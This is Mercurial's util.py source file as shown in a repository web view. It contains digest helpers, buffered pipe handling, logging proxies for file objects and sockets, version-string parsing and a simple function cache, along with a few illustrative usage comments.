util: update lrucachedict order during get()...
Gregory Szorc
r39607:8f2c0d1b default
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect if we are running
# tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

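# Illustrative sketch (not part of util.py): a hypothetical call site for
# nouideprecwarn. With HGEMITWARNINGS set (as the test runner does), this
# emits a Python DeprecationWarning attributed to the caller; otherwise it
# is a no-op.
#
#   nouideprecwarn(b'frobnicate() is deprecated, use frob() instead',
#                  b'4.8', stacklevel=2)
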
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

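# Illustrative sketch (not part of util.py): validating a stream with
# digestchecker. The file name, size, and digest value are hypothetical.
#
#   fh = open('payload.bin', 'rb')
#   wrapped = digestchecker(fh, 3, {
#       'sha1': '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33',
#   })
#   while wrapped.read(4096):
#       pass
#   wrapped.validate()  # raises error.Abort on size or digest mismatch
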
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

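# Illustrative sketch (not part of util.py): on Python 3, where the builtin
# buffer() no longer exists, the shim above returns a zero-copy memoryview
# slice with the same (offset, length) semantics.
#
#   view = buffer(b'abcdef', 2, 3)
#   bytes(view)  # -> b'cde'
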
_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already data then no polling should be set in place."""
        return bool(self._buffer)
313
313
314 @property
314 @property
315 def closed(self):
315 def closed(self):
316 return self._input.closed
316 return self._input.closed
317
317
318 def fileno(self):
318 def fileno(self):
319 return self._input.fileno()
319 return self._input.fileno()
320
320
321 def close(self):
321 def close(self):
322 return self._input.close()
322 return self._input.close()
323
323
324 def read(self, size):
324 def read(self, size):
325 while (not self._eof) and (self._lenbuf < size):
325 while (not self._eof) and (self._lenbuf < size):
326 self._fillbuffer()
326 self._fillbuffer()
327 return self._frombuffer(size)
327 return self._frombuffer(size)
328
328
329 def unbufferedread(self, size):
329 def unbufferedread(self, size):
330 if not self._eof and self._lenbuf == 0:
330 if not self._eof and self._lenbuf == 0:
331 self._fillbuffer(max(size, _chunksize))
331 self._fillbuffer(max(size, _chunksize))
332 return self._frombuffer(min(self._lenbuf, size))
332 return self._frombuffer(min(self._lenbuf, size))
333
333
334 def readline(self, *args, **kwargs):
334 def readline(self, *args, **kwargs):
335 if 1 < len(self._buffer):
335 if 1 < len(self._buffer):
336 # this should not happen because both read and readline end with a
336 # this should not happen because both read and readline end with a
337 # _frombuffer call that collapse it.
337 # _frombuffer call that collapse it.
338 self._buffer = [''.join(self._buffer)]
338 self._buffer = [''.join(self._buffer)]
339 self._lenbuf = len(self._buffer[0])
339 self._lenbuf = len(self._buffer[0])
340 lfi = -1
340 lfi = -1
341 if self._buffer:
341 if self._buffer:
342 lfi = self._buffer[-1].find('\n')
342 lfi = self._buffer[-1].find('\n')
343 while (not self._eof) and lfi < 0:
343 while (not self._eof) and lfi < 0:
344 self._fillbuffer()
344 self._fillbuffer()
345 if self._buffer:
345 if self._buffer:
346 lfi = self._buffer[-1].find('\n')
346 lfi = self._buffer[-1].find('\n')
347 size = lfi + 1
347 size = lfi + 1
348 if lfi < 0: # end of file
348 if lfi < 0: # end of file
349 size = self._lenbuf
349 size = self._lenbuf
350 elif 1 < len(self._buffer):
350 elif 1 < len(self._buffer):
351 # we need to take previous chunks into account
351 # we need to take previous chunks into account
352 size += self._lenbuf - len(self._buffer[-1])
352 size += self._lenbuf - len(self._buffer[-1])
353 return self._frombuffer(size)
353 return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

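# Illustrative sketch (not part of util.py): pairing bufferedinputpipe with
# select-based polling, the collaboration the class docstring describes.
# hasbuffer avoids blocking in select() when data is already buffered; the
# 'rawpipe' object below is hypothetical.
#
#   import select
#   pipe = bufferedinputpipe(rawpipe)
#   if not pipe.hasbuffer:
#       select.select([pipe.fileno()], [], [])
#   line = pipe.readline()
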
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

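# Illustrative sketch (not part of util.py): mmapread accepts either a file
# object or a raw file descriptor; the path below is hypothetical.
#
#   with open('data.bin', 'rb') as fp:
#       data = mmapread(fp)  # mmap object, or '' for an empty file
#       header = data[:16]   # mmap objects support slicing like bytes
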
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)
686
686
687 def send(self, *args, **kwargs):
687 def send(self, *args, **kwargs):
688 return object.__getattribute__(self, r'_observedcall')(
688 return object.__getattribute__(self, r'_observedcall')(
689 r'send', *args, **kwargs)
689 r'send', *args, **kwargs)
690
690
691 def sendall(self, *args, **kwargs):
691 def sendall(self, *args, **kwargs):
692 return object.__getattribute__(self, r'_observedcall')(
692 return object.__getattribute__(self, r'_observedcall')(
693 r'sendall', *args, **kwargs)
693 r'sendall', *args, **kwargs)
694
694
695 def sendto(self, *args, **kwargs):
695 def sendto(self, *args, **kwargs):
696 return object.__getattribute__(self, r'_observedcall')(
696 return object.__getattribute__(self, r'_observedcall')(
697 r'sendto', *args, **kwargs)
697 r'sendto', *args, **kwargs)
698
698
699 def setblocking(self, *args, **kwargs):
699 def setblocking(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
700 return object.__getattribute__(self, r'_observedcall')(
701 r'setblocking', *args, **kwargs)
701 r'setblocking', *args, **kwargs)
702
702
703 def settimeout(self, *args, **kwargs):
703 def settimeout(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
704 return object.__getattribute__(self, r'_observedcall')(
705 r'settimeout', *args, **kwargs)
705 r'settimeout', *args, **kwargs)
706
706
707 def gettimeout(self, *args, **kwargs):
707 def gettimeout(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
708 return object.__getattribute__(self, r'_observedcall')(
709 r'gettimeout', *args, **kwargs)
709 r'gettimeout', *args, **kwargs)
710
710
711 def setsockopt(self, *args, **kwargs):
711 def setsockopt(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
712 return object.__getattribute__(self, r'_observedcall')(
713 r'setsockopt', *args, **kwargs)
713 r'setsockopt', *args, **kwargs)
714
714
class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

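# Illustrative sketch (not part of util.py): logging all I/O on a file
# object. Every observed call on 'proxied' is mirrored to the log handle,
# prefixed with the observer name; the handles and names are hypothetical.
#
#   logfh = open('io.log', 'wb')
#   proxied = makeloggingfileobject(logfh, open('data.bin', 'rb'), b'h2')
#   proxied.read(4)  # appends "h2> read(4) -> 4" to io.log
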
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

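# Illustrative sketch (not part of util.py): the socket analogue of the
# logging file object above; the socket, log handle, and name are
# hypothetical.
#
#   sock = socket.create_connection(('example.com', 80))
#   logged = makeloggingsocket(logfh, sock, b's1')
#   logged.sendall(b'GET / HTTP/1.0\r\n\r\n')  # logs "s1> sendall(18, 0)"
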
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
1045 except ValueError:
1046 break
1046 break
1047 # (3, 6) -> (3, 6, None)
1047 # (3, 6) -> (3, 6, None)
1048 while len(vints) < 3:
1048 while len(vints) < 3:
1049 vints.append(None)
1049 vints.append(None)
1050
1050
1051 if n == 2:
1051 if n == 2:
1052 return (vints[0], vints[1])
1052 return (vints[0], vints[1])
1053 if n == 3:
1053 if n == 3:
1054 return (vints[0], vints[1], vints[2])
1054 return (vints[0], vints[1], vints[2])
1055 if n == 4:
1055 if n == 4:
1056 return (vints[0], vints[1], vints[2], extra)
1056 return (vints[0], vints[1], vints[2], extra)
1057
1057
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

